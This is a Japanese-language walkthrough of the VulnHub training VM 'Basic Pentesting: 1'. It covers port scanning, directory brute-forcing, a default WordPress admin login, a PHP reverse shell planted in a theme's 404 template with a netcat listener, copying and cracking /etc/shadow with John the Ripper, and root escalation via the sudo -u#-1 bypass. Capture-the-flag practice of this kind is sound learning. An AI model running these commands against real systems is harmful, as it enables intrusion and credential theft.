【VulnHub】Basic Pentesting: 1
「Basic Pentesting: 1」は、「Josiah Pierce」によって開発され、VulnHubにて公開されているシリーズの一つです。
■環境
Attack machine(parrot OS)IP:192.168.56.101
Target machine(ubuntu OS)IP:192.168.56.105
■手順
1.nmap(ポートスキャン)
2.gobuster(ディレクトリ・ブルートフォース・アタック)
3.wpログイン
4.404.phpへrevarce shellのコードを作成
5.passwdとshadowを強奪
6.john the ripperでhash化されたパスワードをクラック
7.ssh接続
=========================================================
1.nmap(ポートスキャン)
以下のコマンドを実施。
$ nmap -sV -T4 192.168.56.105 -p-
2.ブラウザーでPort80へアクセス。
収穫特になし
3.gobusterを実行
$ sudo gobuster dir -u http://192.168.56.105/ -w /usr/share/wordlists/dirb/big.txt
4.gobusterで見つけた/secretへアクセス
5.ブラウザーのアドオンで「wappalyzer」を使用してみたところWPを使用していることが分かった。そこから考察をするにWPの管理ページが存在すると思われる。
6.再度gobusterを使用して調べる。
$sudo gobuster dir -u http://192.168.56.105/secret/ -w /usr/share/wordlists/dirb/big.txt
7.これは経験から取り合ず、admin:adminでログインしたら入れた。
ちゃんとログイン情報を調べるなら色々やり方はあるが、burp suiteでも使えばいいと思う。
【ログイン前】
【ログイン後】
8.「Appearance」→「Editor」をクリックして、右側の404 Templateをクリック。
9.404.phpへ以下のURLのコードを張り付けて、以下の箇所を変更して、
「Update File」のボタンをクリック。
============================
$ip = '192.168.56.101'; // CHANGE THIS
$port = 1234; // CHANGE THIS
============================
10.NetCatを使用してport1234で接続を待ち受ける状態にする。
$ nc -lnvp 1234
11.編集した404.phpへアクセスし接続待ちのポートへ接続が確立したことを確認。
http://vtcsec/secret/index.php/404.php
12./etc/passwdと/etc/shadowをローカルPCへコピーをする
$ ls -al /etc/passwd
$ls -al /etc/shadow
右側$ cat /etc/passwd
左側$ vi passwd
左側$cat /etc/shadow
右側$vi shadow
13.John The Ripperにてpasswdとshadowのパスワードクラック。
$ unshadow passwd shadow > hash.txt
$john hash.txt
$john hash.txt --show
14.johnで摘出できたユーザとパスワードを使用して、sshでログイン。
ユーザ名:marlinspike
パスワード:marlinspike
15.色々と調べた結果sudo -uの脆弱性を利用して管理者へ昇格
$sudo -u#-1 /bin/bash
16.whoamiコマンドとidコマンドを実施して、以下の表示がされればOK
◆補足:
sudo の脆弱性を見つけたきっかけになったツールが実はございまして、リンク張っておきます。
これ以外にも、niktoやhydraなどのツールを今回使いました。
今までvulnhubを使用して学習をしてましたが、今回初めて答えを見ずに最後までハッキングすることができました。
感動です。
このVMを作成してくれたJosiah Pierceさん、ありがとうございます。